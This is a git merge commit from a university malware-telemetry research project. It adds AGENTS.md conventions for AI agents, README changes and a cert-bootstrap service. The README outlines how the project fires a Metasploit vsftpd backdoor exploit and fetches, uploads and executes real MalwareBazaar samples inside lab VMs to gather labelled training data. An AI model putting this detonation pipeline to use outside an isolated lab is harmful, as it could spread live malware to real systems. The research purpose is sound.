Merge origin/main into Dev_REL1_043026; accept main's service files

Cherry-picks all upstream additions (fleet runner, full collector suite,
shipper module, exploit driver, samples, scripts/, cis490_doctor, etc.)
and resolves the two service-file conflicts by accepting main's production
versions over the stubs we wrote on Day 1.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
This commit is contained in:
Elliott Kolden 2026-04-30 15:05:51 -06:00
commit 7683b64929
71 changed files with 10477 additions and 214 deletions

202
AGENTS.md Normal file
View file

@ -0,0 +1,202 @@
# AGENTS.md — guidance for AI agents working on this repo
This project is part of the spectral lab (`http://maxgit.wg/spectral/`).
The conventions below also apply to sibling repos (`wg-enroll`,
`wg-pki`, `caddy`, `iptmonads`, `matrix`, `forgejo`, `vault`,
`openclaw-deploy`).
---
## How a lab host gets to "shipping data" — the canonical bring-up
If you (an AI agent OR a human) are looking at a fresh lab host and
asking "is this thing actually generating data for the central
collector?", run this in order. **Cloning the repo by itself does
nothing. Running launchers from a manual clone bypasses the
systemd services that do the actual work.**
```sh
# 0. (One-time, on the Pi only.) Initialize the CIS490 client CA + a
# leaf cert for THIS lab host. Get its WG IP from `wg-enroll-admin
# show <usb>` first.
sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh # idempotent
sudo /home/max/.env/wg-pki/scripts/deploy-cis490-cert.sh \
<host_id> <wg_ip> # mints + scp's + extracts + chmods
# 1. (On the lab host.) Install the lab-host role. This copies the
# repo into /opt/cis490, builds the venv, drops systemd units,
# fetches the Alpine baseline qcow2, and builds the cidata ISO
# with the in-guest agent embedded.
sudo /opt/cis490/scripts/install-lab-host.sh
# (or, if running from the manual clone:)
# sudo ./scripts/install-lab-host.sh
# 2. Edit /etc/cis490/lab-host.toml — set host_id and any overrides.
# 3. Verify everything before enabling the timer-driven services:
/opt/cis490/.venv/bin/python /opt/cis490/tools/cis490_doctor.py \
--role lab-host
# → green/yellow rows means READY; red rows print the exact fix
# command. Re-run until clean.
# 4. Turn on the services. From this moment on, the orchestrator runs
# one fleet wave on each Restart= cycle, and the shipper picks up
# completed episodes and PUTs them to https://collector.wg over mTLS.
sudo systemctl enable --now cis490-shipper cis490-orchestrator
# 5. (On the Pi.) Watch the index grow:
sudo tail -f /var/lib/cis490/index.jsonl
# 6. (Optional, Tier 3.) Enable real exploit fire — needs metasploit.
sudo /opt/cis490/scripts/install-msfrpcd.sh
# Operator-supplied URL + sha256 (Rapid7 download is registration-walled):
IMAGE_URL='…' IMAGE_SHA256='…' sudo OUT_DIR=/var/lib/cis490/vm/images \
/opt/cis490/scripts/fetch-metasploitable2.sh
```
If `index.jsonl` doesn't grow within a wave-interval (~60 s after
`systemctl enable --now`), run `cis490-doctor` again. The most
common silent failures it catches:
- `*.wg` DNS missing (wg-enroll provisions it; manual workaround is
one line in `/etc/hosts`)
- mTLS cert chain not installed under `/etc/cis490/certs/`
- `cis490-shipper` service inactive (forgot step 4)
- `qemu-system-x86_64` not on PATH
`cis490-doctor --json` is machine-readable for use by other agents.
## How an agent generates data on demand (without waiting for the timer)
```sh
# One labeled episode (90 s) with a chosen sample profile:
sudo -u cis490 /opt/cis490/.venv/bin/python \
/opt/cis490/tools/run_real_vm_demo.py \
--data-root /var/lib/cis490/data \
--sample mirai-class-bot
# Force the shipper to run one pass:
sudo systemctl start cis490-shipper.service # (if disabled)
# or:
sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
--config /etc/cis490/lab-host.toml --once
# Confirm on the Pi:
ssh <pi> 'sudo tail -3 /var/lib/cis490/index.jsonl'
```
Any tool that wants to *count* what's been shipped:
```sh
ssh <pi> 'sudo /opt/cis490/.venv/bin/python /opt/cis490/tools/index_reader.py \
--index /var/lib/cis490/index.jsonl --count-by host_id'
```
## Quick test for "is the pipe alive at all"
The `--ping` mode of the shipper does an authenticated POST to
`/v1/ping` and writes nothing to the database. Use it as the
smallest E2E test:
```sh
sudo -u cis490 /opt/cis490/.venv/bin/python -m shipper \
--config /etc/cis490/lab-host.toml --ping
# {"ok": true, "status_code": 200, ...} on success.
# Any other status is the operator's signal to read the error string.
```
---
## File an issue when you hit a problem
**When you run into an issue you cannot fully resolve in the current
turn, file it as a Forgejo issue on the relevant repo before moving
on.** Do not silently log a TODO comment, leave a partial workaround,
or assume someone else will remember. The issue tracker is the
durable record.
This applies to:
- a build / test / typecheck failure you can't fix in scope
- a bug you discover but aren't tasked with fixing
- a missing dep, missing config, or env-only failure that blocks E2E
- a design gap you've worked around but want a follow-up to fix
properly
- a scope-out you made (e.g. "deferred Tier 4 sample fetch") that
needs an owner so it doesn't get lost
Don't file an issue when:
- the user is in the conversation and you can just *tell* them
- it's already filed (search first: `GET /api/v1/repos/<owner>/<repo>/issues?state=open&q=<keyword>`)
- it's truly a non-issue (a one-line edit you're about to make this
same turn)
## How to file (Forgejo API)
The local Forgejo at `http://10.100.0.1:3000` accepts API calls with a
token-bearer header:
```sh
curl -s -X POST \
-H "Authorization: token <TOKEN>" \
-H "Content-Type: application/json" \
http://10.100.0.1:3000/api/v1/repos/spectral/<repo>/issues \
-d '{
"title": "<short, action-oriented title>",
"body": "<context, repro, attempted fixes, suggested next step>"
}'
```
The token comes from the user's session — never embed one in code or
commits.
### What a good issue body contains
1. **Context** — one sentence on what was being attempted.
2. **What happened** — the actual error, log line, or unexpected
behavior. Paste exact output.
3. **What was tried** — every workaround you attempted and why it
didn't stick.
4. **Suggested next step** — the smallest change that would resolve
it, if you have a guess. "Unknown" is a fine answer.
5. **Related** — link the commit / PR / file:line where the issue
surfaced.
### What a good title looks like
| Bad | Good |
|---|---|
| `tests broken` | `tests/test_episode.py: race when t_mono_origin_ns is set in run() not __init__` |
| `caddy thing` | `Caddy: client_auth requires absolute path; relative trusted_ca_cert_file silently fails` |
| `fix later` | `shipper: 5xx backoff cap is 5min, doc says 1min — pick one` |
## After filing
- Reference the issue number in the next commit message:
`Refs spectral/<repo>#<n>` or `Closes spectral/<repo>#<n>` if your
current change actually fixes it.
- If the issue is on a different repo than the one you're committing
to, fully qualify: `spectral/wg-pki#3`.
## Other conventions
- **Don't put off the hard parts.** Frame "deferred-with-reason" only
for genuine blockers (binary not present on this machine, external
service unreachable). For anything you *could* do but find awkward
— bridge setup, cross-arch quirks, fleet concurrency — do it. The
user has flagged this twice when work was scoped down prematurely.
When something genuinely is blocked by an operator artifact, file
the Forgejo issue and *automate the bring-up* (e.g., installer
script + sha256-verifying fetcher) so the moment the artifact lands
it Just Works.
- **Naming:** never coin USB / device / service names on the user's
behalf. Ask first. Reusing an old name is especially bad.
- **`/etc` configs:** `Read` first, copy second. Never overwrite a
`/etc/...` file from a template without checking what's actually
there.
- **wg-enroll scope:** creation-only. Don't add admin /
service-activation features to it.
- **Don't expand a project's binary name beyond its own boundary:**
`openclaw` is the queue/permissions binary in `openclaw-deploy`.
This repo is `wg-enroll` (or its caller). Don't conflate.

307
README.md
View file

@ -4,9 +4,16 @@ Course project for CIS490 (Cybersecurity). The end-goal is an ML model that
watches performance metrics on a real device, decides whether the device has
been breached, and triggers a hardware-level reset when confidence is high
enough. This repository covers the **dataset side** — we run public malware
samples against intentionally vulnerable Linux VMs and capture labeled
time-series telemetry that mirrors what the deployed model would see in the
field.
samples (and behavior-matched mimics) against intentionally vulnerable Linux
VMs and capture labeled time-series telemetry that mirrors what the deployed
model would see in the field.
Concretely, every lab host on the WireGuard mesh detects how much capacity
it has, spins up that many concurrent VMs, gives each VM a *different*
malware profile from the manifest, and ships the resulting labeled episode
tarballs to the central receiver on the Pi over mTLS. Running the same
fleet on multiple hosts gives novel, non-overlapping data per host with no
coordinator — see [Multi-host fleet](#multi-host-fleet) below.
The work is grounded in the trust-over-time scoring model from
[IEEE 9881803](https://ieeexplore.ieee.org/document/9881803).
@ -22,15 +29,33 @@ the set of timestamped phase transitions written to `labels.jsonl` —
sharing a monotonic clock with the metric rows so anything aligned in
time can be aligned in code.
### Tier 2 — *real Alpine VM, real workload driven from inside the guest*
### Tier 2 — *real Alpine VM, profile-driven workload inside the guest*
This is the closest we get to real-malware behaviour without yet running
real malware. Telemetry is real `/proc/<qemu_pid>` from outside the
guest, **and the load is generated inside the guest** by busybox
``yes`` (CPU saturation) and ``dd`` (disk bursts), driven over the
serial console by `tools/vm_load_controller.py`. Every phase transition
in `labels.jsonl` corresponds to an actual command issued inside the
real VM.
guest plus three more sources running concurrently (QMP, bridge pcap,
in-guest agent — see *Telemetry sources* below). The *load* itself is
generated inside the guest by a profile-matched shell command from
[`exploits/workloads.py`](exploits/workloads.py), driven over the
serial console by [`tools/vm_load_controller.py`](tools/vm_load_controller.py).
Each sample's `profile` (from [`samples/manifest.toml`](samples/manifest.toml))
dispatches to a different in-session workload, so the envelope each
VM produces is observably different per family — exactly the variance
the ML model needs to learn:
| profile | shape |
|------------------|--------------------------------------------------------|
| `cpu-saturate` | sustained 1-vCPU saturation (XMRig) |
| `scan-and-dial` | SYN-style probes across the bridge subnet + dial-home |
| `io-walk` | fs traversal + 4 KiB urandom writes (ransomware) |
| `bursty-c2` | long idle + periodic 3-packet egress burst (Dridex) |
| `low-and-slow` | minimal CPU + periodic memory churn (Kovter / fileless)|
| `shell-resident` | one long-lived TCP socket + periodic command ticks (RAT)|
Every phase transition in `labels.jsonl` corresponds to an actual
command issued inside the real VM, and `meta.json` records which
sample / profile / kind drove it.
![Real Alpine VM envelope](docs/images/real-vm-envelope.png)
@ -41,10 +66,20 @@ controller killing the load process inside the VM. The
infected_running → dormant → infected_running re-entry is the textbook
envelope that justifies the whole project framing.
Reproduce with:
Reproduce one episode (profile-driven via `--sample` or `SAMPLE_NAME`
env, defaults to the v1 yes-loop without one):
```sh
uv run python tools/run_real_vm_demo.py --data-root data
uv run python tools/run_real_vm_demo.py --data-root data \
--sample xmrig-cryptominer
```
Or run the **fleet** — one wave of `max_concurrent` parallel episodes,
each slot pulling a different sample from the manifest:
```sh
uv run python tools/run_fleet.py --capacity # see what the host can do
uv run python tools/run_fleet.py --waves 1 --data-root data
```
### Tier 1 — *real Alpine VM, idle baseline*
@ -67,14 +102,68 @@ above produces from real KVM behaviour.
![Synthetic envelope (host-side mimic)](docs/images/synthetic-envelope.png)
### What's still missing for the real-malware envelope
### Tier 3 — *real exploit fire, profile-matched workload (Driver v2)*
The Tier-3 driver lives in [`exploits/`](exploits/README.md) — a tiny
msgpack-over-HTTPS msfrpc client + `MSFExploitDriver`. With a
[`Sample`](samples/manifest.py) supplied, the driver dispatches the
post-exploit `infected_running` workload through
[`exploits/workloads.py`](exploits/workloads.py) — same six profiles
as Tier 2, so a fleet wave produces matched envelopes whether or not
an exploit fires. Without a sample, the v1 yes-loop path is preserved
for smoke runs.
First canned module: `exploits/modules/vsftpd_234_backdoor.toml`
(Metasploitable2's CVE-2011-2523). [`scripts/install-msfrpcd.sh`](scripts/install-msfrpcd.sh)
sets up `msfrpcd` (loopback only) as a hardened systemd unit;
[`scripts/fetch-metasploitable2.sh`](scripts/fetch-metasploitable2.sh)
pulls + sha256-verifies a target image from operator-supplied URL.
### Tier 4 — *real malware sample, fetched + uploaded + executed*
A manifest entry with a `sha256` flips its `Sample.kind` to `"real"`.
The driver then bypasses the mimic profile and runs the real-binary
path:
1. [`tools/fetch_sample.py <sha256>`](tools/fetch_sample.py) pulls the
binary from MalwareBazaar (Auth-Key from
`samples/.bazaar.token` or `MALWAREBAZAAR_API_KEY`), unzips with the
standard `infected` password, sha-verifies, and lands at
`samples/store/<sha256>` (gitignored).
2. At `infected_running`, the driver chunked-uploads the binary into
the shell session as 8 KiB base64 segments
(`exploits.workloads.chunked_real_binary_upload`). 256 KiB binaries
work without buffer-busting msfrpc.
3. The session decodes, sha-verifies *again on the guest side*, chmods,
and execs only if the hash matches. Mismatch fail-stops the run.
4. `meta.sample.sha256` + per-step events
(`real_binary_upload_begin`, `real_binary_verify`,
`sample_executed{kind=real}`) record exactly which binary was run
and when, so trainers can join cleanly.
### Tier maturity
| Tier | What it gives | Status |
|---|---|---|
| 1 — real VM, idle | confidence the collector reads real KVM behaviour | ✅ done |
| 2 — real VM, real workload from inside the guest | first real-load envelope shape | ✅ done |
| 3 — real VM, real exploit fire (Metasploitable + msfrpc) | honest `armed → infecting` transitions | 🚧 |
| 4 — real VM, real malware sample (XMRig from MalwareBazaar) | the full envelope we ultimately train on | 🚧 |
| 1 — real VM, idle | confidence the collectors read real KVM behaviour | ✅ done |
| 2 — real VM, profile-driven workload | distinguishable in-guest envelopes per malware family | ✅ done |
| 3 — real VM, real exploit fire + profile workload | honest `armed → infecting` transitions, driver v2 dispatch | ✅ code; ⏳ awaiting Metasploitable2 image + msfrpcd on a lab host |
| 4 — real VM, real malware sample (MalwareBazaar fetch) | the full envelope we ultimately train on | ✅ code; ⏳ awaiting MalwareBazaar API key + sha256s in manifest |
### Telemetry sources (all five wire into one episode dir)
| # | Source | Vantage | Role |
|---|--------------------------------|---------------|---------------------|
| 1 | host `/proc/<qemu_pid>` | outside | oracle (label only) |
| 2 | QEMU QMP queries | outside | oracle (label only) |
| 3 | `perf stat -p <qemu_pid>` | outside | oracle (label only) |
| 4 | Bridge pcap → 100 ms netflow | gateway-side | feature (deployable)|
| 5 | In-guest agent (virtio-serial) | inside | feature (deployable)|
All five are live. The deploy/oracle split follows
[`docs/threat-model.md`](docs/threat-model.md): only sources 4 + 5
are usable as model *features* in the field — sources 1, 2, 3 exist
as labeling oracles only.
For an interactive view of any episode (zoom/pan/hover), run:
@ -85,83 +174,135 @@ tools/show_envelope.sh data/episodes/<episode_id>
---
## Status
## Status (106/106 tests passing as of `a88ac83`)
- ✅ Receiver (HTTPS PUT, sha256-verified, idempotent) — tested with httpx + curl
- ✅ Orchestrator v0 — single- and scheduled-phase modes, ULID episode ids
- ✅ Host /proc oracle collector (source 1 of 5) at 10 Hz
- ✅ Synthetic envelope demo — full 8-phase envelope produced end-to-end
- ✅ Real VM (Alpine 3.21 cloud-init under KVM) — orchestrator collects against the real `qemu-system` pid
- ✅ **Tier 2 — real VM, real workload:** serial-console-driven load controller fires `yes`/`dd` inside the guest at every phase transition
- 🚧 QMP collector (source 2), bridge pcap collector (source 4), in-guest agent (source 5)
- 🚧 Exploit driver (Metasploit RPC) for `armed → infecting` transitions on `session_open`
- 🚧 Shipper (the third leg of the WG pipeline — receiver and orchestrator already verified)
**Pipeline (lab-host → Pi → tarball stored)**
- ✅ Receiver app (HTTPS PUT, sha256-verified, idempotent) — running on the Pi behind Caddy with mTLS via the wg-pki client CA
- ✅ `POST /v1/ping` smoke endpoint (writes nothing, exercises the full auth path)
- ✅ Shipper (`shipper/`) — tar+zstd, retry/backoff, `--ping` mode
- ✅ Caddy `collector.wg` block (in `spectral/caddy`)
- ✅ Lab-host install script + systemd units (`scripts/install-lab-host.sh`, `etc/cis490-{shipper,orchestrator}.service`)
- ✅ Receiver install script (`scripts/install-receiver.sh`)
- ✅ wg-pki client-CA bootstrap + per-host leaf issuance (in `spectral/wg-pki`)
> **Topology note:** in this project the **Pi5 is the WireGuard-side
> *collector*** that receives episode tarballs from one or more lab hosts.
> It is *not* the deployment target for the model. The deployment target is
> generic ("any constrained Linux device"). See
**Telemetry**
- ✅ Source 1 — host `/proc/<qemu_pid>` @ 10 Hz
- ✅ Source 2 — QEMU QMP @ 1 Hz
- ✅ Source 3 — `perf stat -p <qemu_pid>` (opt-in via `enable_perf`; needs `CAP_SYS_ADMIN` / `CAP_PERFMON`)
- ✅ Source 4 — bridge pcap + 100 ms netflow bucketizer (pure-Python parser, no scapy/dpkt dep), wired into `EpisodeRunner` via `bridge_iface`
- ✅ Source 5 — in-guest agent over virtio-serial; cidata-embedded for first-boot install on Alpine
**Orchestrator + drivers**
- ✅ Orchestrator v0 — phase-scheduled episode runner, ULID episode ids
- ✅ Snapshot/revert via QMP `loadvm` (`revert_at_start` / `revert_at_end`) for clean baselines between episodes
- ✅ Tier 2 driver — real Alpine VM, profile-driven in-guest workload over serial console
- ✅ Tier 3 driver v2 — `MSFExploitDriver` + msfrpc client + per-sample workload dispatch; first canned module `vsftpd_234_backdoor.toml`
- ✅ Tier 4 — `tools/fetch_sample.py` (MalwareBazaar by sha256) + chunked real-binary upload (`exploits.workloads.chunked_real_binary_upload`) + guest-side sha-verify-then-exec dispatch in `MSFExploitDriver`
- ⏳ Tier 3 integration — needs operator to drop a Metasploitable2 image + run `scripts/install-msfrpcd.sh` on a lab host
- ⏳ Tier 4 integration — needs operator's MalwareBazaar API key + at least one `sha256` entry in `samples/manifest.toml`
**Fleet (multi-VM, multi-host data generation)**
- ✅ Resource-aware capacity detector (cores / RAM / load) — `orchestrator/fleet.py`
- ✅ Concurrent slot runner — `tools/run_fleet.py`
- ✅ Sample manifest with six behavioural profiles + deterministic per-(host_id, slot, episode) selection so every host walks the catalog in a different order
> **Topology note:** the **Pi5 is the WireGuard-side *collector*** that
> receives episode tarballs from one or more lab hosts. It is *not* the
> deployment target for the model. The deployment target is generic
> ("any constrained Linux device"). See
> [`docs/architecture.md`](docs/architecture.md).
---
<details>
<summary><b>Quick start — run the synthetic envelope demo (~90 s)</b></summary>
<summary><b>Quick start — fleet mode (the primary workflow)</b></summary>
```sh
git clone https://maxgit.wg/spectral/CIS490.git
cd CIS490
# One-time setup.
uv sync
# Generate one labeled episode (8 phases, 851 telemetry rows, 85 s).
uv run python tools/run_envelope_demo.py --data-root data
# 1. Build the cidata ISO with the in-guest agent baked in.
uv run python tools/build_cidata.py vm/images/cidata.iso
# Render a static PNG envelope of that episode.
uv run python tools/plot_envelope.py data/episodes/<episode_id>
# 2. See what this host is sized for.
uv run python tools/run_fleet.py --capacity
# cores: 4 (reserve 1)
# ram: 7951 MiB total, 5223 MiB available (headroom 1024 MiB, per-vm 320 MiB)
# load: 1m=0.51
# caps: by_cores=3, by_ram=13, by_load=3
# --> max_concurrent VMs: 3
# Or open an interactive plot in your browser:
# 3. Run one wave (= max_concurrent parallel episodes, each with a
# different sample profile).
uv run python tools/run_fleet.py --waves 1 --data-root data
# 4. Plot any episode (matplotlib WebAgg).
tools/show_envelope.sh data/episodes/<episode_id>
```
The data lands in `data/episodes/<ulid>/`:
Each episode dir contains:
```
meta.json episode metadata (image, snapshot, schedule, host fingerprint)
events.jsonl orchestrator actions (snapshot_load, phase_transition, episode_end)
meta.json episode metadata (image, sample, profile, fleet capacity)
events.jsonl orchestrator + driver events (exploit_fire, session_open, sample_executed, ...)
labels.jsonl one row per phase transition — THIS is the envelope
telemetry-proc.jsonl host /proc sampler at 10 Hz
telemetry-proc.jsonl source 1: host /proc sampler @ 10 Hz
telemetry-qmp.jsonl source 2: QMP query-status / blockstats / kvm stats @ 1 Hz
telemetry-guest.jsonl source 5: in-guest agent (CPU jiffies, mem, listen ports, top procs)
network.pcap source 4: tcpdump on br-malware
netflow.jsonl source 4: 100 ms-bucketed pcap aggregation
done.marker written last; the shipper only sees finished episodes
```
</details>
<details>
<summary><b>Quick start — boot a real Linux VM (Cirros)</b></summary>
The phase-2 launcher boots a Cirros qcow2 under KVM and exposes its
QMP/monitor sockets and pidfile. The orchestrator then samples the real
`qemu-system` process.
<summary><b>Quick start — single episode, no fleet</b></summary>
```sh
# Pre-staged: vm/images/cirros-baseline.qcow2 with snapshot 'baseline-v1'.
# (See docs/sources.md for the Cirros sha256.)
# Tier 2 (no exploit, profile-driven workload):
uv run python tools/run_real_vm_demo.py --data-root data \
--sample mirai-class-bot
# Boot in one terminal:
RUN_DIR=/tmp/cis490-vm vm/launch_demo.sh
# In another terminal, point the orchestrator at the VM's pid:
QPID=$(cat /tmp/cis490-vm/qemu.pid)
uv run python -m orchestrator --target-pid $QPID --duration 20
# Plot:
tools/show_envelope.sh data/episodes/<episode_id>
# Tier 3 (real exploit fire via msfrpcd):
MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env; echo $MSFRPC_PASSWORD) \
uv run python tools/run_tier3_demo.py \
--module vsftpd_234_backdoor \
--sample ransomware-mimic \
--data-root data
```
The idle-VM envelope shape is distinct from the synthetic load: periodic
~10% CPU spikes from KVM/timer interrupts, flat ~230 MiB RSS, a single
late-boot disk write. That's a real KVM guest you're seeing.
</details>
<details>
<summary><b>Multi-host fleet — how cross-host diversity works</b></summary>
Each lab host's `host_id` (set in `/etc/cis490/lab-host.toml`) seeds a
deterministic walk through the sample catalog:
```python
# samples/manifest.py
def select(self, *, host_id, slot, episode_index):
seed = f"{host_id}|{slot}|{episode_index}"
idx = sha256(seed)[:8] % len(self.samples)
return self.samples[idx]
```
So:
- `host=alice slot=0 ep=0` and `host=bob slot=0 ep=0` almost certainly
pick *different* samples (test asserts < 25% collision over 20 trials).
- A single host walks the entire catalog within ~`len(manifest)` waves
(test confirms full coverage in 200 episodes).
- No coordinator needed — every host independently produces non-overlapping
data, and `meta.fleet.host_id` + `meta.sample.name` make the join trivial
at training time.
The fleet runner shells out to the same `tools/run_real_vm_demo.py` per
slot, with `SLOT` / `RUN_DIR` / `SAMPLE_NAME` env passed through to the
launcher. Each VM gets its own QMP socket, agent socket, hostfwd port
range, and episode dir, so concurrency is collision-free up to the
capacity ceiling.
</details>
@ -177,15 +318,18 @@ late-boot disk write. That's a real KVM guest you're seeing.
| [`docs/deploy.md`](docs/deploy.md) | One-command install for the lab-host and receiver roles |
| [`docs/lab-setup.md`](docs/lab-setup.md) | KVM prereqs, VM build, snapshot, virtio-serial wiring |
| [`docs/sources.md`](docs/sources.md) | Works cited — every tool, dep, sample source, paper, and standard |
| `orchestrator/` | State machine that drives the boot → arm → detonate → observe → revert loop |
| `collectors/` | One module per telemetry source (host /proc, QMP, perf, pcap, guest agent) |
| `receiver/` | Starlette app: PUT /v1/episodes ingest, sha256-verified, idempotent |
| `vm/` | qcow2 images, launch scripts, snapshot recipes (binaries gitignored) |
| `tools/` | Demo runners, load mimic, plot scripts |
| `exploits/` | Metasploit resource scripts for repeatable exploitation (TODO) |
| `samples/` | Sample manifest (sha256-pinned). **Binaries never committed.** |
| `orchestrator/` | Episode runner + `fleet.py` (capacity detection, concurrent slot driver) |
| `collectors/` | One module per telemetry source: `proc_qemu`, `qmp`, `pcap`, `guest_agent` |
| `receiver/` | Starlette app: PUT `/v1/episodes` + POST `/v1/ping`, sha256-verified, idempotent |
| `shipper/` | Lab-host-side: scan `data/episodes/`, tar+zstd, PUT over mTLS, retry/backoff |
| `vm/` | Launch scripts (`launch_demo.sh`, `launch_target.sh`), `setup_bridge.sh`, in-guest agent at `vm/guest-agent/cis490_agent.py`. qcow2 images and pcap captures gitignored. |
| `tools/` | `run_fleet.py`, `run_real_vm_demo.py`, `run_tier3_demo.py`, `build_cidata.py`, `plot_envelope.py`, `show_envelope.sh` |
| [`exploits/`](exploits/README.md) | MSF RPC client (`msfrpc.py`), `driver.py` (v2 with sample dispatch), `workloads.py` (six profile-matched in-session loops), per-module TOML configs |
| [`samples/`](samples/manifest.toml) | Sample manifest + loader. Binaries land at `samples/store/<sha256>` (gitignored). |
| `scripts/` | `install-{lab-host,receiver,msfrpcd}.sh`, `fetch-metasploitable2.sh` |
| `training/` | Model training code (deferred — schema first) |
| `etc/` | systemd units and config templates installed by the deploy scripts |
| `etc/` | systemd units and config templates (`cis490-{receiver,shipper,orchestrator}.service`, `lab-host.toml.example`, `receiver.toml.example`) |
| [`AGENTS.md`](AGENTS.md) | Conventions for AI agents working on this and sibling spectral repos |
</details>
@ -226,17 +370,26 @@ Two roles, one bootstrap command each. Detailed in
`index.jsonl`. Runs on the Pi5 in our setup.
```sh
# On a lab host:
./scripts/install-lab-host.sh # (TODO — currently bring up by hand per docs/deploy.md)
# On the Pi5 (or any always-on WG node):
./scripts/install-receiver.sh # (TODO — same)
sudo ./scripts/install-receiver.sh
# Add the collector.wg block to spectral/caddy (already merged), then:
sudo systemctl enable --now cis490-receiver
# One-time, on the Pi: bootstrap the CIS490 client CA.
sudo /home/max/.env/wg-pki/scripts/init-cis490-client-ca.sh
# On each lab host: enroll via wg-enroll first, then:
sudo ./scripts/install-lab-host.sh
# Drop a TLS leaf from wg-pki at /etc/cis490/certs/, edit /etc/cis490/lab-host.toml.
sudo systemctl enable --now cis490-shipper cis490-orchestrator
```
For now both bootstrap scripts are scaffolds; the units and configs they
install live in `etc/`. The receiver itself works today
(`uv run python -m receiver --config etc/receiver.toml.example` — modify
paths).
The orchestrator service runs `tools/run_fleet.py --waves 1` per
invocation with `Restart=always`, giving a continuous stream of
fresh-sample episodes per host. The shipper picks them up as
`done.marker` files appear and PUTs them to `https://collector.wg`.
For mTLS leaf-cert minting: `spectral/wg-pki/scripts/issue-cis490-client-cert.sh <host_id>`.
</details>

0
bootstrap/__init__.py Normal file
View file

65
bootstrap/__main__.py Normal file
View file

@ -0,0 +1,65 @@
"""``cis490-bootstrap`` launcher.
Runs as root (needs CA private key access). Listens on 127.0.0.1:8446
behind Caddy's ``bootstrap.wg`` site — Caddy terminates TLS, this
service speaks plain HTTP on loopback only.
"""
from __future__ import annotations
import argparse
import logging
import sys
from pathlib import Path
import uvicorn
from bootstrap.app import make_app
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="cis490-bootstrap")
p.add_argument("--listen-host", default="127.0.0.1")
p.add_argument("--listen-port", type=int, default=8446)
p.add_argument(
"--issuer-script",
type=Path,
default=Path("/home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh"),
help="Path to the wg-pki leaf-cert mint script.",
)
p.add_argument(
"--issued-root",
type=Path,
default=Path("/home/max/.env/wg-pki/issued"),
help="Where minted tarballs are cached.",
)
p.add_argument("--log-level", default="info")
args = p.parse_args(argv)
logging.basicConfig(
level=getattr(logging, args.log_level.upper(), logging.INFO),
format="%(asctime)s %(levelname)s %(name)s %(message)s",
)
log = logging.getLogger("cis490.bootstrap.main")
if not args.issuer_script.exists():
log.error("issuer script missing: %s", args.issuer_script)
return 2
app = make_app(
issuer_script=args.issuer_script,
issued_root=args.issued_root,
)
log.info("listening on %s:%d", args.listen_host, args.listen_port)
uvicorn.run(
app,
host=args.listen_host,
port=args.listen_port,
log_level=args.log_level,
access_log=True,
)
return 0
if __name__ == "__main__":
sys.exit(main())

146
bootstrap/app.py Normal file
View file

@ -0,0 +1,146 @@
"""``cis490-bootstrap`` — auto-issue mTLS leaf certs to enrolled lab hosts.
This is the chicken-and-egg fix for first-time lab-host setup. A
freshly wg-enrolled device has WG access (and trusts the wg-pki CA)
but has no client cert yet, so it can't authenticate to the
mTLS-protected ``collector.wg``. This service exposes a *plain-TLS*
(no client-auth) endpoint that the lab host can call once during
``install-lab-host.sh`` to retrieve its leaf cert tarball.
Trust boundary: anything that reaches ``bootstrap.wg`` has already
passed iptmonads' WG-membership check at L4. No further
authentication is required for the bootstrap pull by the time a
caller can connect at all they're a peer the operator authorized.
The privilege boundary, on the other hand, is real: minting certs
requires the wg-pki CA private key (root-only at
``/var/lib/wg-pki/cis490-client-ca/ca.key``). This service therefore
runs as root in a tight sandbox (see ``etc/cis490-bootstrap.service``)
and shells out to ``issue-cis490-client-cert.sh`` for each mint.
Endpoints:
GET /v1/cert/{host_id} return tarball of {ca.crt, leaf.pem, leaf.key}
for ``host_id``. Cached successive calls
return the same bytes.
GET /v1/health liveness probe (no auth needed).
Each mint is logged with the source IP (after Caddy's X-Real-IP
forward) so the operator has an audit trail of which devices have
fetched which certs.
"""
from __future__ import annotations
import logging
import re
import subprocess
import time
from pathlib import Path
from typing import Awaitable, Callable
from starlette.applications import Starlette
from starlette.requests import Request
from starlette.responses import FileResponse, JSONResponse, Response
from starlette.routing import Route
log = logging.getLogger("cis490.bootstrap")
# Sane host_id charset — same rules the receiver enforces, mirrored
# here so mint requests can't smuggle path traversal in.
_HOST_ID_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")
def _is_valid_host_id(s: str) -> bool:
return bool(_HOST_ID_RE.match(s))
def make_app(
*,
issuer_script: Path,
issued_root: Path,
rate_limit_window_s: float = 5.0,
) -> Starlette:
"""Build the Starlette app. Wired by the production launcher in
``bootstrap/__main__.py``; tests can pass synthetic paths."""
issued_root.mkdir(parents=True, exist_ok=True)
# Coarse per-IP rate limiter to make a casual scan annoying. Not
# a real defense — the WG mesh is the actual perimeter.
last_request: dict[str, float] = {}
async def health(request: Request) -> Response:
return JSONResponse({"status": "ok"})
async def get_cert(request: Request) -> Response:
host_id: str = request.path_params["host_id"]
if not _is_valid_host_id(host_id):
return JSONResponse({"error": "bad host_id"}, status_code=400)
# Caddy forwards the original WG-side IP via X-Real-IP /
# X-Forwarded-For; fall back to the direct peer if running
# without Caddy in front (tests).
src = (
request.headers.get("x-real-ip")
or (request.headers.get("x-forwarded-for") or "").split(",")[0].strip()
or (request.client.host if request.client else "?")
)
now = time.monotonic()
prev = last_request.get(src, 0.0)
if (now - prev) < rate_limit_window_s:
return JSONResponse(
{"error": "rate limited; back off"},
status_code=429,
)
last_request[src] = now
tar_path = issued_root / host_id / f"{host_id}.tar"
if not tar_path.exists():
log.info("minting cert for host_id=%s src=%s", host_id, src)
try:
subprocess.run(
[
str(issuer_script), host_id,
"--out-dir", str(issued_root / host_id),
],
check=True,
capture_output=True,
text=True,
timeout=30,
)
except subprocess.CalledProcessError as e:
log.error("issue script failed for %s: rc=%d stderr=%s",
host_id, e.returncode, e.stderr[:500])
return JSONResponse(
{"error": "mint failed", "detail": e.stderr[:500]},
status_code=500,
)
except (OSError, subprocess.TimeoutExpired) as e:
log.exception("issue script transport error for %s", host_id)
return JSONResponse(
{"error": f"transport: {e}"},
status_code=500,
)
else:
log.info("cache hit for host_id=%s src=%s", host_id, src)
if not tar_path.exists():
return JSONResponse({"error": "tarball not produced"}, status_code=500)
return FileResponse(
tar_path,
media_type="application/x-tar",
filename=f"{host_id}.tar",
headers={
